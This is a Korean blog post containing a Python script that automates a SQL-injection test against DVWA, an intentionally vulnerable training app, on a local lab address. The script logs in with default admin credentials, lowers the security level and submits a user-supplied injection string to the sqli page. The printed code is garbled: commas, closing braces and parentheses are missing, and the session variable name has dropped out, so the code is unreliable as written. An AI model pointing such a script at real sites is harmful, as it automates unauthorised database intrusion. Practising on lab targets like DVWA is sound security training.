Self-Improvement

requests 모듈을 통한 DVWA Low SQL-injection 본문

프로그래밍/Python

requests 모듈을 통한 DVWA Low SQL-injection

JoGeun 2018. 10. 21. 13:04
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import requests 
import re 
import sys 
from bs4 import BeautifulSoup 
 
 
#login 
login_url = 'http://192.168.10.134/dvwa/login.php' 
login_data = {'username':'admin''password':'password''Login':'Login'
proxies = {'http':'http://localhost:9000''https':'http://localhost:9000'
= requests.session() 
req = requests.Request('POST', login_url, data=login_data) 
prepared = s.prepare_request(req) 
resp = s.send(prepared, proxies = proxies) 
 
soup = BeautifulSoup(resp.text,'lxml'
MESS1='Welcome to Damn Vulnerable Web App!' 
if re.search(MESS1, str(soup.h1.string)): 
    print('[ ok ] login'
else
    print("[ fail ] login"
    sys.exit(2
 
#low level setting 
security_url='http://192.168.10.134/dvwa/security.php' 
security_data={'security':'low','seclev_submit':'Submit'
resp=s.post(security_url,data=security_data, proxies=proxies) 
soup=BeautifulSoup(resp.text,'lxml'
if re.search('low'str(soup.em.string)): 
    print('[ ok ] low setting'
else
    print('[ fail] low not setting'
    sys.exit(3
 
#vulnerablility check 
url3='http://192.168.10.134/dvwa/vulnerabilities/sqli/?' 
sqlinjection=input("enter your sqlinjection : "
params1={"id":sqlinjection, "Submit":"Submit"
resp=s.get(url3,params=params1,proxies=proxies) 
soup=BeautifulSoup(resp.text,"lxml"
if re.search("First name:"str(soup.pre)): 
    print("[ ok ] sql_injecton ok"
else
    print("[ fail ] sql_injection")
cs

'프로그래밍 > Python' 카테고리의 다른 글

requests으로 DVWA Low XSS  (0) 2018.10.21
requests으로 DVWA의 Login-dirctionary  (0) 2018.10.21
requests 모듈을 통한 DVWA Low Command injection  (0) 2018.10.21
python BeautifulSoup  (0) 2018.10.21
python request 모듈  (0) 2018.10.21
'프로그래밍/Python' Related Articles more